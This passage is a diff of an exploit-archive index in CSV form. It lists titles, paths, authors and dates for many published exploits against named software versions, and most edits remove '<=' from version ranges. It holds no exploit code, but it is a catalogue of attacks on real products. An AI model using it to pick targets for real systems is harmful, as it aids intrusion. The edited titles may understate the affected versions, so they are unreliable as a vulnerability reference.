16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,Metasploit,windows,remote,21 -16734,platforms/windows/remote/16734.rb,"EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0 +16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 -16737,platforms/windows/remote/16737.rb,"EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit",2010-04-30,Metasploit,windows,remote,21 16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server NLST Response Overflow",2010-11-12,Metasploit,windows,remote,21 @@ -14559,11 +14559,11 @@ id,file,description,date,author,platform,type,port 16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,Metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,Metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,Metasploit,windows,remote,9999 -16759,platforms/win_x86/remote/16759.rb,"SHTTPD <= 1.34 - URI-Encoded POST Request Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 +16759,platforms/win_x86/remote/16759.rb,"SHTTPD 1.34 - URI-Encoded POST Request Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,Metasploit,windows,remote,80 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - EXT.dll Buffer Overflow",2010-07-07,Metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic JSESSIONID Cookie Value Overflow",2010-07-03,Metasploit,windows,remote,80 -16763,platforms/win_x86/remote/16763.rb,"Icecast <= 2.0.1 - Header Overwrite (Win32)",2010-04-30,Metasploit,win_x86,remote,8000 +16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 - Header Overwrite (Win32)",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM Database Parameter Overflow",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,8080 @@ -14571,7 +14571,7 @@ id,file,description,date,author,platform,type,port 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",2010-07-13,Metasploit,windows,remote,8008 16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,Metasploit,windows,remote,0 -16771,platforms/windows/remote/16771.rb,"EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 +16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028 16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 @@ -14586,7 +14586,7 @@ id,file,description,date,author,platform,type,port 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot Overflow",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 -16786,platforms/windows/remote/16786.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,7144 +16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 URL Handling Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,cfm,webapps,0 16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,multiple,remote,8080 @@ -14600,7 +14600,7 @@ id,file,description,date,author,platform,type,port 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow",2010-07-25,Metasploit,windows,remote,0 16799,platforms/windows/remote/16799.rb,"HTTPDX h_handlepeer() Function Buffer Overflow",2010-07-26,Metasploit,windows,remote,0 -16800,platforms/windows/remote/16800.rb,"Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow",2010-06-11,Metasploit,windows,remote,8000 +16800,platforms/windows/remote/16800.rb,"Streamcast 0.9.75 HTTP User-Agent Buffer Overflow",2010-06-11,Metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway Debug Mode Buffer Overflow",2010-04-30,Metasploit,windows,remote,5250 16802,platforms/windows/remote/16802.rb,"Webster HTTP Server GET Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway username Buffer Overflow",2010-07-07,Metasploit,windows,remote,4000 @@ -14612,12 +14612,12 @@ id,file,description,date,author,platform,type,port 16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB HTTP PASS Overflow (Win32)",2010-09-20,Metasploit,win_x86,remote,8080 16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",2010-09-20,Metasploit,windows,remote,443 16811,platforms/windows/webapps/16811.rb,"TrackerCam PHP Argument Buffer Overflow",2010-05-09,Metasploit,windows,webapps,8090 -16812,platforms/windows/remote/16812.rb,"MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 -16813,platforms/windows/remote/16813.rb,"Novell NetMail <= 3.52d NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 +16812,platforms/windows/remote/16812.rb,"MDaemon 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 +16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 16814,platforms/windows/remote/16814.rb,"Novell GroupWise Messenger Client Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 Desktop/Server Management Overflow",2010-07-25,Metasploit,windows,remote,0 16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 Username Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 -16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server <= 5.0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,2380 +16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,2380 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,Metasploit,windows,remote,25 @@ -14655,7 +14655,7 @@ id,file,description,date,author,platform,type,port 16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String",2010-04-30,Metasploit,linux,remote,0 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,Metasploit,hardware,remote,0 -16855,platforms/linux/remote/16855.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)",2010-09-20,Metasploit,linux,remote,0 +16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 URL Handling Buffer Overflow (linux)",2010-09-20,Metasploit,linux,remote,0 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon Arbitrary Command Execution",2010-07-07,Metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",2010-10-05,Metasploit,cgi,webapps,0 16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package passwd.php3 - Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 @@ -14679,11 +14679,11 @@ id,file,description,date,author,platform,type,port 16876,platforms/osx_ppc/remote/16876.rb,"Samba - trans2open Overflow (Mac OS X PPC)",2010-06-21,Metasploit,osx_ppc,remote,0 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter Command Execution",2010-10-06,Metasploit,irix,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,Metasploit,linux,remote,0 -16879,platforms/freebsd/remote/16879.rb,"XTACACSD <= 4.1.2 report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 +16879,platforms/freebsd/remote/16879.rb,"XTACACSD 4.1.2 report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,Metasploit,linux,remote,0 16881,platforms/php/webapps/16881.rb,"Cacti graph_view.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 16882,platforms/php/webapps/16882.rb,"PHP XML-RPC Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 -16883,platforms/php/webapps/16883.rb,"Simple PHP Blog <= 0.4.0 - Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 +16883,platforms/php/webapps/16883.rb,"Simple PHP Blog 0.4.0 - Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 16885,platforms/php/webapps/16885.rb,"TikiWiki jhot Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 16886,platforms/cgi/webapps/16886.rb,"AWStats (6.4-6.5) migrate Remote Command Execution",2010-07-03,Metasploit,cgi,webapps,0 16887,platforms/linux/remote/16887.rb,"HP Openview connectedNodes.ovpl Remote Command Execution",2010-07-03,Metasploit,linux,remote,0 @@ -14696,20 +14696,20 @@ id,file,description,date,author,platform,type,port 16894,platforms/php/webapps/16894.rb,"TWiki Search Function Arbitrary Command Execution",2010-07-03,Metasploit,php,webapps,0 16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 16896,platforms/php/webapps/16896.rb,"vBulletin misc.php Template Name Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 -16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,Metasploit,php,webapps,0 +16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,Metasploit,php,webapps,0 -16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 +16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0 16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 TinyBrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,Metasploit,hardware,webapps,0 16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0 -16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 +16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,Metasploit,linux,remote,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,Metasploit,php,webapps,0 -16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,Metasploit,php,webapps,0 +16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Inclusion",2010-11-24,Metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,Metasploit,php,webapps,0 16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl Arbitrary Command Execution",2010-07-03,Metasploit,cgi,webapps,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,Metasploit,linux,remote,0 @@ -14745,14 +14745,14 @@ id,file,description,date,author,platform,type,port 16945,platforms/hardware/dos/16945.pl,"Nokia N97 m3u Playlist Crash PoC",2011-03-08,KedAns-Dz,hardware,dos,0 16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 WordPress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps,0 -16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 +16949,platforms/php/webapps/16949.php,"maian weblog 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0 -16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 - Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 +16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS (2)",2011-03-10,zx2c4,linux,dos,0 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 & 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 -16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 - Buffer Overflow",2011-03-07,Metasploit,windows,remote,0 +16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control 5.52 - Buffer Overflow",2011-03-07,Metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,Metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0 @@ -14761,13 +14761,13 @@ id,file,description,date,author,platform,type,port 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 Miltiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 Command Execution",2011-03-11,Metasploit,unix,remote,8812 16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow Exploit",2011-03-12,"C4SS!0 G0M3S",windows,local,0 -16966,platforms/linux/dos/16966.php,"PHP <= 5.3.6 - shmop_read() Integer Overflow DoS",2011-03-12,"Jose Carlos Norte",linux,dos,0 +16966,platforms/linux/dos/16966.php,"PHP 5.3.6 - shmop_read() Integer Overflow DoS",2011-03-12,"Jose Carlos Norte",linux,dos,0 16968,platforms/php/webapps/16968.txt,"Cover Vision SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps,0 16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0 -16970,platforms/windows/remote/16970.rb,"Kolibri <= 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,Metasploit,windows,remote,0 +16970,platforms/windows/remote/16970.rb,"Kolibri 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,Metasploit,windows,remote,0 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0 16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0 -16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 +16973,platforms/linux/dos/16973.c,"Linux 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 16974,platforms/android/remote/16974.html,"Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - (.lst) Buffer Overflow Exploit (SEH)",2011-03-14,h1ch4m,windows,local,0 @@ -14785,7 +14785,7 @@ id,file,description,date,author,platform,type,port 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,Metasploit,multiple,remote,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0 -16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 +16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 16995,platforms/php/webapps/16995.txt,"Joomla com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0 16996,platforms/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash PoC",2011-03-17,"Anastasios Monachos",windows,dos,0 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0 @@ -14807,7 +14807,7 @@ id,file,description,date,author,platform,type,port 17015,platforms/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 17016,platforms/asp/webapps/17016.txt,"EAFlashUpload 2.5 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 17018,platforms/php/webapps/17018.txt,"Shimbi CMS - Multiple SQL Injection Vulnerabilities",2011-03-21,p0pc0rn,php,webapps,0 -17019,platforms/windows/dos/17019.txt,"RealPlayer <= 14.0.1.633 Heap Overflow",2011-03-21,"Luigi Auriemma",windows,dos,0 +17019,platforms/windows/dos/17019.txt,"RealPlayer 14.0.1.633 Heap Overflow",2011-03-21,"Luigi Auriemma",windows,dos,0 17020,platforms/netware/dos/17020.py,"Novell Netware NWFTPD.NLM DELE Remote Code Execution",2011-03-21,"Francis Provencher",netware,dos,0 17021,platforms/windows/dos/17021.py,"SpoonFTP 1.2 - RETR Denial of Service",2011-03-21,"C4SS!0 G0M3S",windows,dos,0 17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 @@ -14875,7 +14875,7 @@ id,file,description,date,author,platform,type,port 17094,platforms/php/webapps/17094.html,"Allomani Web Links 1.0 - CSRF (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - CSRF (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 - CSRF (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 -17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - Remote SQL Injection",2011-04-05,LiquidWorm,php,webapps,0 +17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0 17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation pre-auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - XSS",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - CSRF",2011-04-01,"High-Tech Bridge SA",php,webapps,0 @@ -14909,7 +14909,7 @@ id,file,description,date,author,platform,type,port 17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b - LFI",2011-04-07,Osirys,php,webapps,0 17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 -17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 +17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - afd.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 @@ -14930,17 +14930,17 @@ id,file,description,date,author,platform,type,port 17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,Metasploit,windows,local,0 17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,Metasploit,windows,remote,25 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,Metasploit,windows,remote,9090 -17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro <= 1.70 - (.visprj) Buffer Overflow",2011-04-11,Metasploit,windows,local,0 +17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro 1.70 - (.visprj) Buffer Overflow",2011-04-11,Metasploit,windows,local,0 17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0 17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - (.ord) Buffer Overflow",2011-04-12,"C4SS!0 G0M3S",windows,local,0 -17158,platforms/windows/local/17158.txt,"Microsoft HTML Help <= 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0 -17159,platforms/windows/dos/17159.txt,"Microsoft Host Integration Server <= 8.5.4224.0 DoS Vulnerabilities",2011-04-12,"Luigi Auriemma",windows,dos,0 -17160,platforms/windows/dos/17160.txt,"Microsoft Reader <= 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",windows,dos,0 -17161,platforms/windows/dos/17161.txt,"Microsoft Reader <= 2.1.1.3143 Heap Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 -17162,platforms/windows/dos/17162.txt,"Microsoft Reader <= 2.1.1.3143 - Integer Overflow (2)",2011-04-12,"Luigi Auriemma",windows,dos,0 -17163,platforms/windows/dos/17163.txt,"Microsoft Reader <= 2.1.1.3143 Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 -17164,platforms/windows/dos/17164.txt,"Microsoft Reader <= 2.1.1.3143 NULL Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 +17158,platforms/windows/local/17158.txt,"Microsoft HTML Help 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0 +17159,platforms/windows/dos/17159.txt,"Microsoft Host Integration Server 8.5.4224.0 DoS Vulnerabilities",2011-04-12,"Luigi Auriemma",windows,dos,0 +17160,platforms/windows/dos/17160.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",windows,dos,0 +17161,platforms/windows/dos/17161.txt,"Microsoft Reader 2.1.1.3143 Heap Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 +17162,platforms/windows/dos/17162.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (2)",2011-04-12,"Luigi Auriemma",windows,dos,0 +17163,platforms/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 Array Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0 +17164,platforms/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 NULL Byte Write",2011-04-12,"Luigi Auriemma",windows,dos,0 17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection and Path Disclosure",2011-04-13,swami,php,webapps,0 17166,platforms/windows/local/17166.py,"PlaylistMaker 1.5 - (.txt) Buffer Overflow",2011-04-13,"C4SS!0 G0M3S",windows,local,0 17169,platforms/bsd/local/17169.pl,"NEdit 5.5 - Format String",2011-04-14,Tosh,bsd,local,0 @@ -14948,7 +14948,7 @@ id,file,description,date,author,platform,type,port 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - (.pls) Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 -17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit",2011-04-15,bitform,multiple,webapps,0 +17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 Post-authentication Local File 